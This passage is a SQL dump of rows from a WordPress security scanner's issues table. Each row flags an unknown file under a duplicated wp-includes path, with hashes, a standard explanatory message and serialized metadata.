More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_mrgreen.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34036,1631564689,1631564689,'new','knownfile',75,'0e4a931bdb5744f2056b40fb95ad7036','821d234d578601f266f39eb8179fafd4','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_neutral.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_neutral.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34037,1631564689,1631564689,'new','knownfile',75,'bf6588d8a02a73b738bc9a74838ae1a7','53825fbecd4f3e830ec3069017478123','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_question.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/images/smilies/icon_question.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34038,1631564690,1631564690,'new','knownfile',75,'87eee4fdaf975d08ac33b5b23d67a339','75e1c7e0bb249ef749f43f09482e1aee','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_razz.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_razz.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34039,1631564690,1631564690,'new','knownfile',75,'2d8bea8a6305b1612c501a08760a16e7','4d04dccf56220e84d3a62f7f971255eb','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_redface.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_redface.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34040,1631564690,1631564690,'new','knownfile',75,'331753072b516ba1111df40a6f355b9c','05f0750108326573212d8ed661051225','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_rolleyes.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/images/smilies/icon_rolleyes.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34041,1631564690,1631564690,'new','knownfile',75,'5952e8684cecd3602d538919737a8ebc','fbf0bc98b0b1aa14be140eb3453eb8c0','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_sad.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_sad.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34042,1631564690,1631564690,'new','knownfile',75,'c928b96c7e9eed8b90ce3f4ab42854ec','1098aeea16423129e61c0441d1196ea7','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_smile.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/images/smilies/icon_smile.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34043,1631564690,1631564690,'new','knownfile',75,'bfc8d4dac1c9bc3c0b82897c22238872','75b126f943f751baf61751f24938c459','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_surprised.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/images/smilies/icon_surprised.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34044,1631564690,1631564690,'new','knownfile',75,'f3a516022d877a1c86a97af85231da74','33e2c44de46a8ffb80c398c0a1ebe0b6','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_twisted.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_twisted.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34045,1631564690,1631564690,'new','knownfile',75,'5539d860a843d81a3c54cd741e500160','d26701119cbb2d06abac1c66fb474828','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_wink.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_wink.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34046,1631564690,1631564690,'new','knownfile',75,'eecd7a9a2df3b25c969d30ed7feaa3df','cb140fa1eff5056ff3c0acf75f2a34ab','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/mrgreen.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/smilies/mrgreen.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34047,1631564690,1631564690,'new','knownfile',75,'1432ab7f03bc6a570ca9fe735d4e4a78','6533191dd61d2472fa0ae401115efad3','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/rolleyes.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/rolleyes.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34048,1631564690,1631564690,'new','knownfile',75,'53a123e6ad19f3c3e4d0ff3ffa273d8f','7c21af4de499404b8aa1abee4850dbb0','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/simple-smile.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/simple-smile.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34049,1631564690,1631564690,'new','knownfile',75,'3f0259ecf1724186ca29c652fe412e09','36dd03b8f7315422ebd3ade18eba9486','Unknown file in WordPress core: wp-includes/wp-includes/images/spinner-2x.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/spinner-2x.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34050,1631564690,1631564690,'new','knownfile',75,'0de165ea9cec08b316b97df7e27f9460','085bdeb218991f9b985477df6396fa7f','Unknown file in WordPress core: wp-includes/wp-includes/images/spinner.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/images/spinner.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34051,1631564690,1631564690,'new','knownfile',75,'f482f23ac9eb35447ecccc9827b3e4dc','7f89e984b37d2553c35cb9f57353ebb5','Unknown file in WordPress core: wp-includes/wp-includes/images/toggle-arrow-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/toggle-arrow-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34052,1631564690,1631564690,'new','knownfile',75,'2c583f3ff8a8fc7363be7a3aba17e3c8','3719825f22e69192792bc5d4d2a79c1b','Unknown file in WordPress core: wp-includes/wp-includes/images/toggle-arrow.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/images/toggle-arrow.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34053,1631564690,1631564690,'new','knownfile',75,'801b94ddc4bb3aae1fc161f627bab64b','5acfeb975079bfd2c8235f2f90adae05','Unknown file in WordPress core: wp-includes/wp-includes/images/uploader-icons-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/uploader-icons-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34054,1631564690,1631564690,'new','knownfile',75,'3c07562cf35f65d61dbda600dbc93bb1','82ef2d04489fbc066ecae98cbe9183d5','Unknown file in WordPress core: wp-includes/wp-includes/images/uploader-icons.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/images/uploader-icons.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34055,1631564691,1631564691,'new','knownfile',75,'e2939a45010cdf0ee5d6895d39bce6fe','dc21a788521f7334d3baa9ed19719c0a','Unknown file in WordPress core: wp-includes/wp-includes/images/w-logo-blue-white-bg.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/w-logo-blue-white-bg.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34056,1631564691,1631564691,'new','knownfile',75,'57562017543f28d9fe7a5f9c91a975be','6f1b27c4a69a528d8e722085f2c80b10','Unknown file in WordPress core: wp-includes/wp-includes/images/w-logo-blue.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/images/w-logo-blue.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34057,1631564691,1631564691,'new','knownfile',75,'d1a06ddde0430e47e5a065ffe222d1a6','854d8408883dfef0930cf1cb44111aa1','Unknown file in WordPress core: wp-includes/wp-includes/images/wlw/wp-comments.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/wlw/wp-comments.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34058,1631564691,1631564691,'new','knownfile',75,'d985ea1ffbd44ddfb8301a38a4efdf3e','c2436e8f29be1645f006906c088f7349','Unknown file in WordPress core: wp-includes/wp-includes/images/wlw/wp-icon.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/images/wlw/wp-icon.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34059,1631564691,1631564691,'new','knownfile',75,'36173eed9e610be0ca49867c599147d5','227fb7297bb58af89d6d8194746bb2a2','Unknown file in WordPress core: wp-includes/wp-includes/images/wlw/wp-watermark.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/wlw/wp-watermark.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34060,1631564691,1631564691,'new','knownfile',75,'3626aa1fa66ec68aa5e3ea03d55bfd9a','41613803e281526724dd916dae369872','Unknown file in WordPress core: wp-includes/wp-includes/images/wpicons-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/wpicons-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34061,1631564691,1631564691,'new','knownfile',75,'8de2d0ac522dd95cc20571d8f1dccb4f','30b6cdcfb5225464a42d8ea474a8ae68','Unknown file in WordPress core: wp-includes/wp-includes/images/wpicons.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/images/wpicons.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34062,1631564691,1631564691,'new','knownfile',75,'f5d75340ccc590aa659aea76cb8ca990','6a8ff729d6d046043a7659d8bba9413d','Unknown file in WordPress core: wp-includes/wp-includes/images/wpspin-2x.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/images/wpspin-2x.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34063,1631564691,1631564691,'new','knownfile',75,'135cbd8861f29b040526bea83c73ff0b','d56caf17c006488fbcf3f40eac14b45a','Unknown file in WordPress core: wp-includes/wp-includes/images/wpspin.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/images/wpspin.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34064,1631564691,1631564691,'new','knownfile',75,'fd6c2f90419570d1af14769360443b30','79f54a0b5f14c8e1c79060ccc3436f69','Unknown file in WordPress core: wp-includes/wp-includes/images/xit-2x.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/images/xit-2x.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34065,1631564691,1631564691,'new','knownfile',75,'679c42ac75bcfdcf20733bfd42a3040f','2a9e4fa38c46b9e61a597fcb045edbdc','Unknown file in WordPress core: wp-includes/wp-includes/images/xit.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/images/xit.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34066,1631564691,1631564691,'new','knownfile',75,'6b56594499821f65e75be6697e581a85','965dc13f074b4599c0baec43ae9020c9','Unknown file in WordPress core: wp-includes/wp-includes/js/admin-bar.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/admin-bar.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34067,1631564691,1631564691,'new','knownfile',75,'4f70be370df42a86179beba0d8dbe1a8','e9f5151d37a6b047a2d8dc9cec33e353','Unknown file in WordPress core: wp-includes/wp-includes/js/admin-bar.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/admin-bar.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34068,1631564691,1631564691,'new','knownfile',75,'d23c65686d03fb213ff275e89d0c3824','7b91d19e194f804f25ac7bdfd339870a','Unknown file in WordPress core: wp-includes/wp-includes/js/api-request.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/api-request.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34069,1631564691,1631564691,'new','knownfile',75,'a51c9c379020c8d85fefb948874c3c30','d2166ed0781bea58baae551ce6516c80','Unknown file in WordPress core: wp-includes/wp-includes/js/api-request.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/api-request.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34070,1631564691,1631564691,'new','knownfile',75,'75bdef5d896e834477d4c0fc5e4b2e5c','57e1a811404dd974583eaa8ff3e1646b','Unknown file in WordPress core: wp-includes/wp-includes/js/autosave.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/autosave.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34071,1631564691,1631564691,'new','knownfile',75,'2cb77339c53a6fc33535c629478cd914','bf66969082ab3cbf800683f593b6849b','Unknown file in WordPress core: wp-includes/wp-includes/js/autosave.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/autosave.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34072,1631564691,1631564691,'new','knownfile',75,'905365db676c3bc5625a5ef617f281d1','6aa4569939be1d4114007219951f9e93','Unknown file in WordPress core: wp-includes/wp-includes/js/backbone.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/backbone.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34073,1631564691,1631564691,'new','knownfile',75,'06ae6de61d4ac8e62363208119b35faa','9d6bfbc2a517c52db0d2972f7893e15d','Unknown file in WordPress core: wp-includes/wp-includes/js/backbone.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/backbone.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34074,1631564691,1631564691,'new','knownfile',75,'d19d2f50439fdbab84e86a31153a8060','14f9d4c7e2c6ea93f0807f2a2adb2810','Unknown file in WordPress core: wp-includes/wp-includes/js/clipboard.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/clipboard.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34075,1631564691,1631564691,'new','knownfile',75,'e045caadbc687adb9efd8ea2b8880871','2b977d4395fcaa9e81566a563f419448','Unknown file in WordPress core: wp-includes/wp-includes/js/clipboard.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 